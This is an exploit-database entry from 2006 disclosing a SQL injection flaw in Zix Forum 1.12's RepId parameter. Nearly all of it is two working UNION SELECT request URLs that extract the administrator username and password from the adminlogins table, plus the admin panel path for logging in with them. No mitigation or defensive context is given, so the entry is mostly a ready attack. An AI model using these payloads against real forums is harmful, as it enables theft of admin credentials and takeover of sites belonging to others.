id: 783
date: 09/04/2006
title: Zix Forum <= 1.12 (RepId) Remote SQL Injection Vulnerability
author: Chironex Fleckeri
cves: 

============================================================
Zix Forum <= 1.12 (RepId) Remote SQL Injection Vulnerability
============================================================



################################################################################
##                                                                            ##
##   ZIXForum 1.12 <= "RepId" Remote SQL Injection                            ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##  Credit by        |  Chironex Fleckeri                                     ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##                                                                            ##
################################################################################

##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################

##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################

################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################



#  0day.today [2023-03-27]  #